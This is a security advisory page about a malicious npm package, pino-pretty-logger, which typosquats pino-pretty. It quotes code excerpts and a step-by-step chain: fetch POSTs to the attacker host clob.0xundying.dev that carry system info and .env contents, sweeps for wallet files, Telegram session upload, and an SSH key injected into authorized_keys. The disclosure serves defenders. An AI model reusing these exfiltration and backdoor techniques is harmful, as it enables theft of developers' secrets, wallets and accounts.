VDB

GCVE-110-OSM-2026-3697

GCVE-110-OSM-2026-3697
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 7, 2026
Exfiltrates environment files, crypto wallet files, and Telegram Desktop session data to attacker C2 clob.0xundying.dev at require-time, then injects a hardcoded RSA backdoor key into ~/.ssh/authorized_keys on Linux for persistent SSH access. All five exfil channels fire silently on require() with no install hook and no user interaction. Typosquats pino-pretty (5.5M weekly downloads) with 355 confirmed victim downloads. **Trigger** (`require-time`): `dist/index.js` line 4 executes `require('./logger')`, immediately running module-level code in `dist/logger.js` — no preinstall/postinstall hook present. **Excerpt A — exfil transport (system info)**: `fetch(`${_srv}/api/validate/system-info`, {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({operatingSystem, ipAddress, username})})` where `_srv` resolves to the attacker C2 base URL (`clob.0xundying.dev`), set as a literal string constant in `dist/logger.js`. **Excerpt B — data collection (.env)**: `const _ec = fs.readFileSync(path.join(process.cwd(), '.env'), 'utf8')` followed by POST to `/api/validate/project-env` with `{envContent: _ec, projectPath: _pp}`. **Collection chain**: 1. `_ssi()` — collects OS platform, all IPv4 addresses (`os.networkInterfaces()`), and `os.userInfo().username`; POSTs to `https://clob.0xundying.dev/api/validate/system-info`. 2. `_spe()` — reads `process.cwd()/.env` in full; POSTs content + project path to `https://clob.0xundying.dev/api/validate/project-env`. 3. `_sejf()` + `_saf()` — recursively sweeps homedir and system paths for all `.env` files; JSON files matching 30+ crypto wallet keywords (mnemonic, seed, privatekey, metamask, phantom, exodus, trustwallet, keystore, etc.) plus numeric-named files; and documents (`.doc`, `.docx`, `.xls`, `.xlsx`, `.txt`) matching the same keyword list. All POSTed to `https://clob.0xundying.dev/api/validate/files`. 4. `_stia()` + `_ptg()` [macOS/Windows] — checks `https://clob.0xundying.dev/api/validate/tdata/check` as a dedup sentinel, then gzip-compresses the complete Telegram Desktop `tdata/` directory and streams it to `https://clob.0xundying.dev/api/validate/tdata/upload` using custom binary framing. Max 500MB upload. Enables full Telegram session hijack without the victim's password. 5. `_ark()` [Linux only] — writes hardcoded RSA-4096 public key (`user@DESKTOP-VFF5DKR`) to `~/.ssh/authorized_keys` via `fs.writeFileSync` + `fs.chmodSync(_akp, 0o600)`, creating `~/.ssh/` at mode `0o700` if absent. Grants the attacker persistent SSH backdoor access. All five operations use `.catch(() => {})` to silently suppress errors.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownpino-pretty-logger

References

vendor

Browse GCVE Records

73,196 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›